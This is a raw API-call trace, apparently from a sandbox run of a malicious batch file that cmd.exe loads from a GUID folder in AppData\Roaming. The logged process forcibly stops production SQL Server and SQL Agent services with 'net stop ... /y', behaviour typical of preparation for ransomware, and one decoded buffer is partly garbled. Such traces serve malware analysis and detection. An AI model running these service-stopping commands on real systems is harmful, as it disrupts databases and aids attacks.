hFindFile=0x3f8278) returned 1 [0218.733] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.734] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0218.734] SetErrorMode (uMode=0x0) returned 0x1 [0218.734] GetProcessHeap () returned 0x3e0000 [0218.734] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0218.734] GetProcessHeap () returned 0x3e0000 [0218.734] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0218.734] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0218.734] GetProcessHeap () returned 0x3e0000 [0218.734] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0218.734] GetProcessHeap () returned 0x3e0000 [0218.734] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0218.735] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0218.735] GetProcessHeap () returned 0x3e0000 [0218.735] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0218.735] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0218.735] GetProcessHeap () returned 0x3e0000 [0218.735] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0218.735] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0218.735] GetProcessHeap () returned 0x3e0000 [0218.735] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0218.736] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0218.736] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0218.736] GetLastError () returned 0x2 [0218.737] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0218.737] GetLastError () returned 0x2 [0218.737] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0218.737] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3f90 [0218.738] FindClose (in: hFindFile=0x3f3f90 | out: hFindFile=0x3f3f90) returned 1 [0218.738] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0218.738] GetLastError () returned 0x2 [0218.738] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3f90 [0218.739] FindClose (in: hFindFile=0x3f3f90 | out: hFindFile=0x3f3f90) returned 1 [0218.739] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.739] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0218.739] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0218.739] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0218.740] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0218.740] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQL$PROD /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQL$PROD /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSSQL$PROD /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x950, dwThreadId=0x930)) returned 1 [0218.744] CloseHandle (hObject=0x78) returned 1 [0218.744] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0218.744] GetProcessHeap () returned 0x3e0000 [0218.744] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0218.744] GetEnvironmentStringsW () returned 0x3f8408* [0218.744] GetProcessHeap () returned 0x3e0000 [0218.744] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0218.745] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0218.745] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0219.019] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0219.019] CloseHandle (hObject=0x74) returned 1 [0219.020] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0219.020] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0219.020] GetProcessHeap () returned 0x3e0000 [0219.020] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0219.020] GetEnvironmentStringsW () returned 0x3f8408* [0219.020] GetProcessHeap () returned 0x3e0000 [0219.020] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0219.020] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0219.020] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0219.020] GetProcessHeap () returned 0x3e0000 [0219.021] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0219.021] GetEnvironmentStringsW () returned 0x3f8408* [0219.021] GetProcessHeap () returned 0x3e0000 [0219.021] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0219.021] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0219.021] GetProcessHeap () returned 0x3e0000 [0219.021] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0219.021] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0219.021] _get_osfhandle (_FileHandle=1) returned 0x264 [0219.021] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0219.021] _get_osfhandle (_FileHandle=1) returned 0x264 [0219.021] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0219.021] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0219.021] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0219.022] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0219.022] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0219.022] SetConsoleInputExeNameW () returned 0x1 [0219.022] GetConsoleOutputCP () returned 0x1b5 [0219.022] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0219.022] SetThreadUILanguage (LangId=0x0) returned 0x409 [0219.022] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0219.023] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0219.023] _get_osfhandle (_FileHandle=3) returned 0x74 [0219.023] SetFilePointer (in: hFile=0x74, lDistanceToMove=6216, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1848 [0219.023] GetProcessHeap () returned 0x3e0000 [0219.023] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0219.023] GetProcessHeap () returned 0x3e0000 [0219.023] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0219.023] GetProcessHeap () returned 0x3e0000 [0219.023] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0219.023] GetProcessHeap () returned 0x3e0000 [0219.023] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0219.023] GetProcessHeap () returned 0x3e0000 [0219.023] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0219.023] GetProcessHeap () returned 0x3e0000 [0219.023] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0219.023] GetProcessHeap () returned 0x3e0000 [0219.023] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0219.023] GetProcessHeap () returned 0x3e0000 [0219.023] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0219.023] GetProcessHeap () returned 0x3e0000 [0219.023] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0219.023] GetProcessHeap () returned 0x3e0000 [0219.023] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0219.023] GetProcessHeap () returned 0x3e0000 [0219.023] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0219.023] GetProcessHeap () returned 0x3e0000 [0219.023] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0219.023] GetProcessHeap () returned 0x3e0000 [0219.023] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffaf0 | out: hHeap=0x3e0000) returned 1 [0219.023] _get_osfhandle (_FileHandle=3) returned 0x74 [0219.023] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1848 [0219.024] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x79, lpOverlapped=0x0) returned 1 [0219.024] SetFilePointer (in: hFile=0x74, lDistanceToMove=6243, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1863 [0219.024] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=27, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SQLAgent$PROD /y\r\nServiceΓÇ¥ /y\r\ny\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 27 [0219.024] _get_osfhandle (_FileHandle=3) returned 0x74 [0219.024] GetFileType (hFile=0x74) returned 0x1 [0219.024] _get_osfhandle (_FileHandle=3) returned 0x74 [0219.024] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1863 [0219.024] GetProcessHeap () returned 0x3e0000 [0219.024] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x400ad8 [0219.024] GetProcessHeap () returned 0x3e0000 [0219.024] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x400ad8 | out: hHeap=0x3e0000) returned 1 [0219.028] _tell (_FileHandle=3) returned 6243 [0219.028] _close (_FileHandle=3) returned 0 [0219.028] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0219.028] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0219.028] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0219.028] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0219.028] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0219.028] _wcsicmp (_String1="net", _String2="CD") returned 11 [0219.028] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0219.028] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0219.028] _wcsicmp (_String1="net", _String2="REN") returned -4 [0219.028] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0219.028] _wcsicmp (_String1="net", _String2="SET") returned -5 [0219.028] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0219.028] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0219.028] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0219.028] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0219.028] _wcsicmp (_String1="net", _String2="MD") returned 1 [0219.028] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0219.028] _wcsicmp (_String1="net", _String2="RD") returned -4 [0219.028] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0219.028] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0219.028] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0219.029] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0219.029] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0219.029] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0219.029] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0219.029] _wcsicmp (_String1="net", _String2="VER") returned -8 [0219.029] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0219.029] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0219.029] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0219.029] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0219.029] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0219.029] _wcsicmp (_String1="net", _String2="START") returned -5 [0219.029] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0219.029] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0219.029] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0219.029] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0219.029] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0219.029] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0219.029] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0219.029] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0219.029] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0219.029] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0219.029] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0219.029] SetErrorMode (uMode=0x0) returned 0x1 [0219.030] GetProcessHeap () returned 0x3e0000 [0219.030] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0219.030] GetProcessHeap () returned 0x3e0000 [0219.030] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0219.030] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0219.030] GetProcessHeap () returned 0x3e0000 [0219.030] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0219.030] GetProcessHeap () returned 0x3e0000 [0219.030] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0219.030] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0219.031] GetProcessHeap () returned 0x3e0000 [0219.031] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0219.031] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0219.031] GetProcessHeap () returned 0x3e0000 [0219.031] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0219.031] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0219.031] GetProcessHeap () returned 0x3e0000 [0219.031] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0219.031] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.032] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0219.032] GetLastError () returned 0x2 [0219.032] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0219.033] GetLastError () returned 0x2 [0219.033] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.033] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0219.033] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0219.034] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0219.034] GetLastError () returned 0x2 [0219.034] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0219.034] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0219.035] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0219.035] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0219.035] SetErrorMode (uMode=0x0) returned 0x1 [0219.035] GetProcessHeap () returned 0x3e0000 [0219.035] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0219.035] GetProcessHeap () returned 0x3e0000 [0219.036] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0219.036] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0219.036] GetProcessHeap () returned 0x3e0000 [0219.036] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0219.036] GetProcessHeap () returned 0x3e0000 [0219.036] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0219.036] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0219.036] GetProcessHeap () returned 0x3e0000 [0219.036] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0219.036] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0219.036] GetProcessHeap () returned 0x3e0000 [0219.037] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0219.037] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0219.037] GetProcessHeap () returned 0x3e0000 [0219.037] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0219.037] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.038] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0219.038] GetLastError () returned 0x2 [0219.038] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0219.038] GetLastError () returned 0x2 [0219.039] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.039] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3fd0 [0219.039] FindClose (in: hFindFile=0x3f3fd0 | out: hFindFile=0x3f3fd0) returned 1 [0219.040] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0219.040] GetLastError () returned 0x2 [0219.040] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3fd0 [0219.040] FindClose (in: hFindFile=0x3f3fd0 | out: hFindFile=0x3f3fd0) returned 1 [0219.041] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0219.041] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0219.041] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0219.041] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0219.041] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0219.041] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SQLAgent$PROD /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SQLAgent$PROD /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SQLAgent$PROD /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xa0c, dwThreadId=0x8a8)) returned 1 [0219.046] CloseHandle (hObject=0x74) returned 1 [0219.046] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0219.046] GetProcessHeap () returned 0x3e0000 [0219.046] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0219.046] GetEnvironmentStringsW () returned 0x3f8408* [0219.046] GetProcessHeap () returned 0x3e0000 [0219.046] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0219.046] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0219.046] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0219.256] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0219.258] CloseHandle (hObject=0x78) returned 1 [0219.258] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0219.258] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0219.258] GetProcessHeap () returned 0x3e0000 [0219.258] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: 